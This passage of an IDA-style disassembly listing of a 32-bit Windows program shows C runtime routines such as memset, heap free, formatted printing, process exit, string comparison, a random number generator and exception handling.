; ---------------------------------------------------------------------------
loc_403F4F: ; CODE XREF: sub_403F45+6�j
jmp sub_4060E5
sub_403F45 endp
; =============== S U B R O U T I N E =======================================
sub_403F54 proc near ; CODE XREF: sub_403FB5+D�p
; sub_40405A+80�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_403F5A: ; CODE XREF: sub_403F54+13�j
cmp eax, dword_410448[ecx*8]
jz short loc_403F75
inc ecx
cmp ecx, 2Dh
jb short loc_403F5A
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_403F7D
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_403F75: ; CODE XREF: sub_403F54+D�j
mov eax, dword_41044C[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_403F7D: ; CODE XREF: sub_403F54+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_403F54 endp
; =============== S U B R O U T I N E =======================================
sub_403F8F proc near ; CODE XREF: sub_401470+15�p
; sub_401840+C7�p ...
call sub_406471
test eax, eax
jnz short loc_403F9E
mov eax, offset dword_4105B0
retn
; ---------------------------------------------------------------------------
loc_403F9E: ; CODE XREF: sub_403F8F+7�j
add eax, 8
retn
sub_403F8F endp
; =============== S U B R O U T I N E =======================================
sub_403FA2 proc near ; CODE XREF: sub_403FB5+1�p
; sub_409CCB+1D�p ...
call sub_406471
test eax, eax
jnz short loc_403FB1
mov eax, offset dword_4105B4
retn
; ---------------------------------------------------------------------------
loc_403FB1: ; CODE XREF: sub_403FA2+7�j
add eax, 0Ch
retn
sub_403FA2 endp
; =============== S U B R O U T I N E =======================================
sub_403FB5 proc near ; CODE XREF: sub_409C48+58�p
; sub_409DE4+577�p ...
arg_0 = dword ptr 4
push esi
call sub_403FA2
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_403F54
pop ecx
mov esi, eax
call sub_403F8F
mov [eax], esi
pop esi
retn
sub_403FB5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403FE0 proc near ; CODE XREF: sub_4017C0+4B�p
; sub_401960+35�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_404055
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_40400C
cmp edx, 100h
jb short loc_40400C
cmp dword_413B84, 0
jz short loc_40400C
jmp sub_406835
; ---------------------------------------------------------------------------
loc_40400C: ; CODE XREF: sub_403FE0+14�j
; sub_403FE0+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_404045
neg ecx
and ecx, 3
jz short loc_404027
sub edx, ecx
loc_40401D: ; CODE XREF: sub_403FE0+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_40401D
loc_404027: ; CODE XREF: sub_403FE0+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_404045
rep stosd
test edx, edx
jz short loc_40404F
loc_404045: ; CODE XREF: sub_403FE0+32�j
; sub_403FE0+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_404045
loc_40404F: ; CODE XREF: sub_403FE0+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404055: ; CODE XREF: sub_403FE0+A�j
mov eax, [esp+arg_0]
retn
sub_403FE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40405A proc near ; CODE XREF: sub_401840+76�p
; sub_401840+E5�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004040B9 SIZE 0000002F BYTES
push 0Ch
push offset dword_40E4D0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_4040E2
cmp dword_413B88, 3
jnz short loc_4040B9
push 4
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_40519A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_404099
push esi
push eax
call sub_4051C5
pop ecx
pop ecx
loc_404099: ; CODE XREF: sub_40405A+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4040B0
cmp [ebp+var_1C], 0
jnz short loc_4040E2
push [ebp+arg_0]
jmp short loc_4040BA
sub_40405A endp
; =============== S U B R O U T I N E =======================================
sub_4040B0 proc near ; CODE XREF: sub_40405A+46�p
; DATA XREF: seg001:0040E4E8�o
push 4
call sub_405049
pop ecx
retn
sub_4040B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40405A
loc_4040B9: ; CODE XREF: sub_40405A+1A�j
push esi
loc_4040BA: ; CODE XREF: sub_40405A+54�j
push 0
push dword_41157C
call dword_40D0FC ; RtlFreeHeap
test eax, eax
jnz short loc_4040E2
call sub_403F8F
mov esi, eax
call dword_40D050 ; RtlGetLastWin32Error
push eax
call sub_403F54
mov [esi], eax
pop ecx
loc_4040E2: ; CODE XREF: sub_40405A+11�j
; sub_40405A+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40405A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: sub_404199+12�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_404116
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_404196
; ---------------------------------------------------------------------------
loc_404116: ; CODE XREF: sub_4040E8+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_404142
cmp esi, ebx
jnz short loc_404142
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_404195
; ---------------------------------------------------------------------------
loc_404142: ; CODE XREF: sub_4040E8+37�j
; sub_4040E8+3B�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_404151
mov [ebp+var_1C], ecx
loc_404151: ; CODE XREF: sub_4040E8+64�j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_406AC5
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_404194
dec [ebp+var_1C]
js short loc_404186
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_404192
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040E8+95�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4068C4
pop ecx
pop ecx
loc_404192: ; CODE XREF: sub_4040E8+9C�j
mov eax, edi
loc_404194: ; CODE XREF: sub_4040E8+90�j
pop edi
loc_404195: ; CODE XREF: sub_4040E8+58�j
pop esi
loc_404196: ; CODE XREF: sub_4040E8+29�j
pop ebx
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
sub_404199 proc near ; CODE XREF: sub_401960+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_4040E8
add esp, 14h
retn
sub_404199 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B4 proc near ; CODE XREF: sub_401E40+51�p
; sub_402040+956�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4041DF
loc_4041C2: ; CODE XREF: sub_4041B4+30�j
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40422C
; ---------------------------------------------------------------------------
loc_4041DF: ; CODE XREF: sub_4041B4+C�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4041C2
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_406AC5
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_40421D
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_404229
; ---------------------------------------------------------------------------
loc_40421D: ; CODE XREF: sub_4041B4+60�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4068C4
pop ecx
pop ecx
loc_404229: ; CODE XREF: sub_4041B4+67�j
mov eax, esi
pop esi
loc_40422C: ; CODE XREF: sub_4041B4+29�j
pop ebx
leave
retn
sub_4041B4 endp
; =============== S U B R O U T I N E =======================================
sub_40422F proc near ; CODE XREF: seg001:00404CA2�p
; seg001:00404CC8�p ...
arg_0 = dword ptr 4
call sub_405F02
push [esp+arg_0]
call sub_405D62
push off_4105C0
call sub_4062CC
push 0FFh
call eax
add esp, 0Ch
retn
sub_40422F endp
; =============== S U B R O U T I N E =======================================
sub_404253 proc near ; CODE XREF: sub_404279+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call dword_40D104 ; GetModuleHandleA
test eax, eax
jz short locret_404278
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_40D100 ; GetProcAddress
test eax, eax
jz short locret_404278
push [esp+arg_0]
call eax
locret_404278: ; CODE XREF: sub_404253+D�j
; sub_404253+1D�j
retn
sub_404253 endp
; =============== S U B R O U T I N E =======================================
sub_404279 proc near ; CODE XREF: sub_403B17+34�p
; sub_4043DD+C5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_404253
pop ecx
push [esp+arg_0]
call dword_40D0D4 ; ExitProcess
int 3 ; Trap to Debugger
loc_40428E: ; CODE XREF: sub_407541+C�p
push 8
call sub_405121
pop ecx
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
sub_404297 proc near ; CODE XREF: sub_407577�p
push 8
call sub_405049
pop ecx
retn
sub_404297 endp
; =============== S U B R O U T I N E =======================================
sub_4042A0 proc near ; CODE XREF: sub_4043DD+8C�p
; sub_4043DD+9C�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4042B0
; ---------------------------------------------------------------------------
loc_4042A5: ; CODE XREF: sub_4042A0+14�j
mov eax, [esi]
test eax, eax
jz short loc_4042AD
call eax
loc_4042AD: ; CODE XREF: sub_4042A0+9�j
add esi, 4
loc_4042B0: ; CODE XREF: sub_4042A0+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4042A5
pop esi
retn
sub_4042A0 endp
; =============== S U B R O U T I N E =======================================
sub_4042B8 proc near ; CODE XREF: sub_40434B+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4042D0
; ---------------------------------------------------------------------------
loc_4042C1: ; CODE XREF: sub_4042B8+1C�j
test eax, eax
jnz short loc_4042D6
mov ecx, [esi]
test ecx, ecx
jz short loc_4042CD
call ecx
loc_4042CD: ; CODE XREF: sub_4042B8+11�j
add esi, 4
loc_4042D0: ; CODE XREF: sub_4042B8+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4042C1
loc_4042D6: ; CODE XREF: sub_4042B8+B�j
pop esi
retn
sub_4042B8 endp
; =============== S U B R O U T I N E =======================================
sub_4042D8 proc near ; CODE XREF: sub_405CAD+12�p
; sub_407B1C+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_404300
loc_4042E3: ; CODE XREF: sub_4042D8+2F�j
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_404300: ; CODE XREF: sub_4042D8+9�j
mov eax, dword_4113D0
cmp eax, esi
jz short loc_4042E3
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_4042D8 endp
; =============== S U B R O U T I N E =======================================
sub_40430F proc near ; CODE XREF: sub_405CAD+2D�p
; sub_4061E9+16�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_404337
loc_40431A: ; CODE XREF: sub_40430F+2E�j
call sub_403F8F
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_404337: ; CODE XREF: sub_40430F+9�j
cmp dword_4113D0, esi
jz short loc_40431A
mov ecx, dword_4113DC
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_40430F endp
; =============== S U B R O U T I N E =======================================
sub_40434B proc near ; CODE XREF: seg001:00404CE0�p
arg_0 = dword ptr 4
cmp dword_413BBC, 0
jz short loc_40436E
push offset dword_413BBC
call sub_407680
test eax, eax
pop ecx
jz short loc_40436E
push [esp+arg_0]
call dword_413BBC
pop ecx
loc_40436E: ; CODE XREF: sub_40434B+7�j
; sub_40434B+16�j
call sub_4075D7
push offset dword_40D240
push offset dword_40D224
call sub_4042B8
test eax, eax
pop ecx
pop ecx
jnz short locret_4043DC
push esi
push edi
push offset sub_4075B3
call sub_40757D
mov esi, offset dword_40D21C
mov eax, esi
mov edi, offset dword_40D220
cmp eax, edi
pop ecx
jnb short loc_4043B4
loc_4043A5: ; CODE XREF: sub_40434B+67�j
mov eax, [esi]
test eax, eax
jz short loc_4043AD
call eax
loc_4043AD: ; CODE XREF: sub_40434B+5E�j
add esi, 4
cmp esi, edi
jb short loc_4043A5
loc_4043B4: ; CODE XREF: sub_40434B+58�j
cmp dword_413BC0, 0
pop edi
pop esi
jz short loc_4043DA
push offset dword_413BC0
call sub_407680
test eax, eax
pop ecx
jz short loc_4043DA
push 0
push 2
push 0
call dword_413BC0
loc_4043DA: ; CODE XREF: sub_40434B+72�j
; sub_40434B+81�j
xor eax, eax
locret_4043DC: ; CODE XREF: sub_40434B+3B�j
retn
sub_40434B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043DD proc near ; CODE XREF: sub_4044BF+8�p
; sub_4044D0+8�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004044B9 SIZE 00000006 BYTES
push 10h
push offset dword_40E4F0
call __SEH_prolog4
push 8
call sub_405121
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
xor ebx, ebx
inc ebx
cmp dword_411410, ebx
jz short loc_40447F
mov dword_41140C, ebx
mov al, byte ptr [ebp+arg_8]
mov byte_411408, al
cmp [ebp+arg_4], edi
jnz short loc_40446F
push dword_413BB4
call sub_4062CC
mov [ebp+var_1C], eax
push dword_413BB0
call sub_4062CC
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_20], esi
cmp [ebp+var_1C], edi
jz short loc_40445F
loc_404439: ; CODE XREF: sub_4043DD+6A�j
; sub_4043DD+75�j ...
sub esi, 4
mov [ebp+var_20], esi
cmp esi, [ebp+var_1C]
jb short loc_40445F
cmp dword ptr [esi], 0
jz short loc_404439
mov edi, [esi]
call sub_4062C3
cmp edi, eax
jz short loc_404439
push edi
call sub_4062CC
pop ecx
call eax
jmp short loc_404439
; ---------------------------------------------------------------------------
loc_40445F: ; CODE XREF: sub_4043DD+5A�j
; sub_4043DD+65�j
push offset dword_40D250
mov eax, offset dword_40D244
call sub_4042A0
pop ecx
loc_40446F: ; CODE XREF: sub_4043DD+35�j
push offset dword_40D258
mov eax, offset dword_40D254
call sub_4042A0
pop ecx
loc_40447F: ; CODE XREF: sub_4043DD+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4044AA
cmp [ebp+arg_8], 0
jnz short loc_4044B9
mov dword_411410, ebx
push 8
call sub_405049
pop ecx
push [ebp+arg_0]
call sub_404279
loc_4044A7: ; DATA XREF: seg001:0040E508�o
xor ebx, ebx
inc ebx
sub_4043DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4044AA proc near ; CODE XREF: sub_4043DD+A9�p
cmp dword ptr [ebp+10h], 0
jz short locret_4044B8
push 8
call sub_405049
pop ecx
locret_4044B8: ; CODE XREF: sub_4044AA+4�j
retn
sub_4044AA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4043DD
loc_4044B9: ; CODE XREF: sub_4043DD+B2�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_4043DD
; =============== S U B R O U T I N E =======================================
sub_4044BF proc near ; CODE XREF: seg001:0040202D�p
; seg001:00404D1C�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_4043DD
add esp, 0Ch
retn
sub_4044BF endp
; =============== S U B R O U T I N E =======================================
sub_4044D0 proc near ; CODE XREF: seg001:00404D4C�p
; sub_40793E+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4043DD
add esp, 0Ch
retn
sub_4044D0 endp
; =============== S U B R O U T I N E =======================================
sub_4044E1 proc near ; CODE XREF: seg001:loc_404D21�p
push 1
push 0
push 0
call sub_4043DD
add esp, 0Ch
retn
sub_4044E1 endp
; =============== S U B R O U T I N E =======================================
sub_4044F0 proc near ; CODE XREF: seg001:loc_404D51�p
push 1
push 1
push 0
call sub_4043DD
add esp, 0Ch
retn
sub_4044F0 endp
; =============== S U B R O U T I N E =======================================
sub_4044FF proc near ; CODE XREF: sub_406621+C4�p
push esi
call sub_4062C3
mov esi, eax
push esi
call sub_405F3B
push esi
call sub_407B02
push esi
call sub_404D85
push esi
call sub_407AF8
push esi
call sub_407AEE
push esi
call sub_4078E4
push esi
call nullsub_1
push esi
call sub_407774
push offset sub_4044D0
call sub_406255
add esp, 24h
mov off_4105C0, eax
pop esi
retn
sub_4044FF endp
; =============== S U B R O U T I N E =======================================
sub_40454B proc near ; CODE XREF: sub_402040+475�p
; sub_402040+7B6�p ...
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_407E0C
add esp, 0Ch
retn
sub_40454B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40455C proc near ; CODE XREF: sub_402040+3EF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_404573
xor eax, eax
jmp loc_40460D
; ---------------------------------------------------------------------------
loc_404573: ; CODE XREF: sub_40455C+E�j
cmp ebx, 4
push edi
jb short loc_4045EE
lea edi, [ebx-4]
test edi, edi
jbe short loc_4045EE
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_404586: ; CODE XREF: sub_40455C+66�j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_4045E4
cmp dl, [ecx-4]
jnz short loc_4045E4
mov dl, [eax-3]
test dl, dl
jz short loc_4045DA
cmp dl, [ecx-3]
jnz short loc_4045DA
mov dl, [eax-2]
test dl, dl
jz short loc_4045D0
cmp dl, [ecx-2]
jnz short loc_4045D0
mov dl, [eax-1]
test dl, dl
jz short loc_4045C6
cmp dl, [ecx-1]
jnz short loc_4045C6
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_404586
jmp short loc_404605
; ---------------------------------------------------------------------------
loc_4045C6: ; CODE XREF: sub_40455C+58�j
; sub_40455C+5D�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_404616
; ---------------------------------------------------------------------------
loc_4045D0: ; CODE XREF: sub_40455C+4C�j
; sub_40455C+51�j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_404616
; ---------------------------------------------------------------------------
loc_4045DA: ; CODE XREF: sub_40455C+40�j
; sub_40455C+45�j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_404616
; ---------------------------------------------------------------------------
loc_4045E4: ; CODE XREF: sub_40455C+34�j
; sub_40455C+39�j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_404616
; ---------------------------------------------------------------------------
loc_4045EE: ; CODE XREF: sub_40455C+1B�j
; sub_40455C+22�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_404605
; ---------------------------------------------------------------------------
loc_4045F6: ; CODE XREF: sub_40455C+AC�j
mov dl, [eax]
test dl, dl
jz short loc_404610
cmp dl, [ecx]
jnz short loc_404610
inc eax
inc ecx
inc [ebp+var_4]
loc_404605: ; CODE XREF: sub_40455C+68�j
; sub_40455C+98�j
cmp [ebp+var_4], ebx
jb short loc_4045F6
xor eax, eax
loc_40460C: ; CODE XREF: sub_40455C+BC�j
pop edi
loc_40460D: ; CODE XREF: sub_40455C+12�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404610: ; CODE XREF: sub_40455C+9E�j
; sub_40455C+A2�j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_404616: ; CODE XREF: sub_40455C+72�j
; sub_40455C+7C�j ...
sub eax, ecx
jmp short loc_40460C
sub_40455C endp
; =============== S U B R O U T I N E =======================================
sub_40461A proc near ; CODE XREF: sub_402040+76�p
arg_0 = dword ptr 4
call sub_4064E8
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_40461A endp
; =============== S U B R O U T I N E =======================================
sub_404627 proc near ; CODE XREF: sub_402040:loc_4020E0�p
call sub_4064E8
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_404627 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404650 proc near ; DATA XREF: sub_402040+19�o
; __SEH_prolog4�o ...
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00407F41 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, dword_410440
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_404688
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_403F45
loc_404688: ; CODE XREF: sub_404650+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_403F45
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_4047C5
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40471F
loc_4046C1: ; CODE XREF: sub_404650+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_4046ED
mov edx, edi
call sub_407F2A
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_40472B
jg short loc_404735
mov eax, [esp+24h+var_10]
loc_4046ED: ; CODE XREF: sub_404650+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_4046C1
cmp [esp+24h+var_11], 0
jz short loc_40471F
loc_4046FB: ; CODE XREF: sub_404650+E3�j
; sub_404650+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40470F
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_403F45
loc_40470F: ; CODE XREF: sub_404650+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_403F45
loc_40471F: ; CODE XREF: sub_404650+6F�j
; sub_404650+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40472B: ; CODE XREF: sub_404650+95�j
mov [esp+24h+var_C], 0
jmp short loc_4046FB
; ---------------------------------------------------------------------------
loc_404735: ; CODE XREF: sub_404650+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40476B
cmp dword_413BA8, 0
jz short loc_40476B
push offset dword_413BA8
call sub_407680
add esp, 4
test eax, eax
jz short loc_40476B
mov edx, [esp+24h+arg_0]
push 1
push edx
call dword_413BA8
add esp, 8
loc_40476B: ; CODE XREF: sub_404650+EF�j
; sub_404650+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_407F5A
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_404790
push offset dword_410440
push edi
mov edx, ebp
mov ecx, eax
call sub_407F74
mov eax, [esp+24h+arg_4]
loc_404790: ; CODE XREF: sub_404650+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_4047AB
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_403F45
loc_4047AB: ; CODE XREF: sub_404650+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_403F45
mov ecx, [ebx+8]
mov edx, edi
jmp loc_407F41
; ---------------------------------------------------------------------------
loc_4047C5: ; CODE XREF: sub_404650+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40471F
push offset dword_410440
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_407F74
jmp loc_4046FB
sub_404650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4047F0 proc near ; CODE XREF: sub_402040+D�p
; sub_40BF90+11�j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_404804: ; CODE XREF: sub_4047F0+29�j
cmp ecx, eax
jb short loc_404812
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_404812: ; CODE XREF: sub_4047F0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_404804
sub_4047F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40481B proc near ; CODE XREF: sub_402E60+63�p
; sub_402F20+4A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_404846
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4048C5
; ---------------------------------------------------------------------------
loc_404846: ; CODE XREF: sub_40481B+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_404872
cmp esi, ebx
jnz short loc_404872
call sub_403F8F
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4048C4
; ---------------------------------------------------------------------------
loc_404872: ; CODE XREF: sub_40481B+34�j
; sub_40481B+38�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_404881
mov [ebp+var_1C], ecx
loc_404881: ; CODE XREF: sub_40481B+61�j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_406AC5
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_4048C3
dec [ebp+var_1C]
js short loc_4048B5
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_4048C1
; ---------------------------------------------------------------------------
